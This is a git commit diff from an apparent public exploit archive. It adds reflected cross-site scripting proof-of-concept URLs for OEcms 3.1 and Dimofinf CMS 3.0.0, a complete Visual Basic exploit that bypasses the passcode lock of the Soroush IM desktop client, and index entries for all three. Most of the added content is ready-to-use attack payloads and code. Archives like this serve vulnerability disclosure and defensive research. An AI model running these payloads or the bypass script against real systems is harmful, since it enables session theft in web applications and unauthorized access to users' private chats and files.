DB: 2018-06-16

3 changes to exploits/shellcodes Soroush IM Desktop app 0.15 - Authentication Bypass OEcms 3.1 - Cross-Site Scripting Dimofinf CMS 3.0.0 - Cross-Site Scripting
2018-06-16 05:01:46 +00:00 · 2018-06-16 05:01:46 +00:00 · 329d5722a0
commit 329d5722a0
parent 1ccdc79fbd
4 changed files with 92 additions and 0 deletions
--- a/exploits/php/webapps/44895.txt
+++ b/exploits/php/webapps/44895.txt
@ -0,0 +1,13 @@
+# Title: OEcms 3.1 - Cross-Site Scripting 
+# Author: Felipe "Renzi" Gabriel
+# Date: 2018-06-15
+# Software: OEcms v3.1
+# CVE: CVE-2018-12095
+ 
+# Technical Details & Description:
+# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application.
+# The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.
+ 
+# PoC
+ 
+http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>
--- a/exploits/php/webapps/44897.txt
+++ b/exploits/php/webapps/44897.txt
@ -0,0 +1,11 @@
+# Title: Dimofinf CMS 3.0.0 - Cross-Site Scripting 
+# Author: Felipe "Renzi" Gabriel
+# Date: 2018-06-13
+# Software: Dimofinf CMS Version 3.0.0
+# CVE: CVE-2018-12094
+
+# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Dimofinf CMS" web-application.
+# The vulnerability is located in the 'id' parameter of the`news.php` action GET method request.
+ 
+# PoC
+http://Target/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)>
--- a/exploits/windows/local/44896.vb
+++ b/exploits/windows/local/44896.vb
@ -0,0 +1,65 @@
+# Exploit Title: Soroush IM Desktop app 0.15 - Authentication Bypass
+# Date: 2018-06-13
+# Exploit Author: VortexNeoX64
+# Vendor Homepage: https://soroush-app.ir
+# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
+# Version: 0.15 BETA
+# Tested on: Windows 10 1803
+
+# Security Issue:
+# Attackers can unlock the client app installed on Windows OS(others?) without the passcode
+# and access to all the files, chats, images, and etc.
+# the attacker can then send, receive message of any kind on the behalf of the authorized user.
+
+# PoC (.NET 4.0 Visual Basic)
+
+''make sure before running this exploit the Soroush Messager window is NOT  minimized
+''adding  InteropServices for DLLImport
+Imports System.Runtime.InteropServices    
+Module Module1
+    
+''FindWindow API from user32.dll to get the window handler by lpWindowName 
+    <DllImport("user32.dll", SetLastError:=True)>
+    Private Function FindWindow(lpClassName As String, lpWindowName As String) As IntPtr
+    End Function
+''MoveWindow API from user32.dll to move and resize the window to trigger the bypass process
+    <DllImport("user32.dll", SetLastError:=True)> Private Function MoveWindow(hWnd As IntPtr, X As Integer, Y As Integer,
+    nWidth As Integer, nHeight As Integer, bRepaint As Boolean) As Boolean
+    End Function
+    Sub Main()
+        Try
+            Console.WriteLine("<<<<<Soroush IM Desktop GUI misbehaviour leads to passcode bypass>>>>> ")
+            Console.WriteLine("****** Developer: NeoVortex")
+            Console.WriteLine("****** Client Version 0.15 BETA")
+            Console.WriteLine("****** Tested on windows 10 1803")
+            Console.WriteLine("[****] Make sure the Messager windows is not minimized ")
+            Console.WriteLine("[Press any key to start the exploit...]")
+            Console.ReadKey()
+            Dim pss() As Process = Process.GetProcessesByName("Soroush")
+            Dim hWnd As IntPtr = FindWindow(Nothing, "Soroush")
+'' check if the app is running
+            If (pss.Count > 0) Then
+                Console.WriteLine("[****] Process found with id: " & pss(0).Id)
+                Console.WriteLine("[****] Process File " & pss(0).MainModule.FileName)
+                Console.WriteLine("[****] Resizing to trigger the vulnerability.....")
+'' move and resize the window 
+                MoveWindow(hWnd, 100, 100, 100, 100, True)
+                Console.WriteLine("[****] Done")
+                Console.WriteLine("[****] Now close the Soroush messager windows via X button (NOT via system tray) , then reopen it ")
+                Console.WriteLine("[****] Passcode will be bypassed! ")
+'' now you should close the exploit window and then close the Soroush messager window manually via X button(NOT FROM SYSTEM TRAY) because the Soroush messager window dose not support WM_CLOSE signal for the single window closing
+''if anyone could close the GUI window without accually killing the app, he/she is welcome at gitub link below.
+            Else
+''app is not ruuning
+                Console.WriteLine("[----]Process not found ")
+            End If
+            Console.ReadKey()
+
+        Catch ex As Exception
+            Beep()
+            MsgBox(ex.Message, 16)
+            Console.ReadKey()
+        End Try
+    End Sub
+
+End Module
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9781,6 +9781,7 @@ id,file,description,date,author,type,platform,port
 44888,exploits/windows/local/44888.txt,"Microsoft Windows 10 - Child Process Restriction Mitigation Bypass",2018-06-13,"Google Security Research",local,windows,
 44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
+44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39554,3 +39555,5 @@ id,file,description,date,author,type,platform,port
 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
 44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,
+44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
+44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,